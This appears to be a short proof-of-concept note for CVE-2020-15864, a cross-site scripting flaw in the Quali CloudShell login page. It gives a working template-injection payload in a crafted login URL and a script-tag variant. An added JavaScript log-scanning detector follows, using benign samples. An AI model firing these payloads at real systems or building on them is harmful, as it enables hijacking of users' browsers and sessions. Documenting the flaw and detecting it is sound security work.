Payload:
{{constructor.constructor(%27alert(19891337)%27)()}}
Add "username" as a parameter to the login URL to reference the username field of the Quali CloudShell login page. The JavaScript then executes when a user visits the URL, for example:
https://victim/Account/Login?ReturnUrl%252fAccount%252f%&username={{constructor.constructor(%27alert(1337)%27)()}}
Note: <sCript>alert(1337)<scRipt> works too, but isn't as dangerous because it won't autoload through the URL like the constructor payload does.
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15864
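
For triage on the defender side, request logs can be searched for login requests whose query parameters decode to a `{{ ... }}` template expression like the one above. The following JavaScript is an added example, not part of the original post or of Quali's code; the function names, the decode-round limit and the sample request targets are constructed for illustration.

```javascript
// Added example (not from the original post): flag request targets whose
// query parameters decode to a "{{ ... }}" template expression.
const MAX_ROUNDS = 3; // assumption: enough to unwrap double/triple encoding

// Decode valid %XX runs only, so a stray "%" elsewhere in the value
// (as in the ReturnUrl above) cannot stop the rest from being decoded.
function decodeOnce(value) {
  return value.replace(/(?:%[0-9a-fA-F]{2})+/g, (run) => {
    try {
      return decodeURIComponent(run);
    } catch (e) {
      return run; // not valid UTF-8: leave the run untouched
    }
  });
}

function fullyDecode(value) {
  let current = value;
  for (let i = 0; i < MAX_ROUNDS; i++) {
    const next = decodeOnce(current);
    if (next === current) break;
    current = next;
  }
  return current;
}

// Names of query parameters whose decoded value contains "{{ ... }}".
function findTemplateParams(requestTarget) {
  const q = requestTarget.indexOf("?");
  if (q === -1) return [];
  const hits = [];
  for (const pair of requestTarget.slice(q + 1).split("&")) {
    const eq = pair.indexOf("=");
    if (eq === -1) continue; // no value to inspect
    const value = fullyDecode(pair.slice(eq + 1).replace(/\+/g, " "));
    if (/\{\{[\s\S]*?\}\}/.test(value)) hits.push(fullyDecode(pair.slice(0, eq)));
  }
  return hits;
}

// Constructed sample request targets (benign {{1+1}} probe, not real logs).
const SAMPLE_TARGETS = [
  "/Account/Login?ReturnUrl=%2f&username=alice",
  "/Account/Login?username=%7B%7B1%2B1%7D%7D",
  "/Account/Login?username=%257B%257B1%252B1%257D%257D",
  "/Account/Login?ReturnUrl%252fAccount%252f%&username={{1+1}}",
];

function scanTargets(targets) {
  return targets.filter((t) => findTemplateParams(t).length > 0);
}
```

`scanTargets(SAMPLE_TARGETS)` returns the last three entries: the single-encoded, double-encoded and raw forms are all flagged, while the ordinary login request is not.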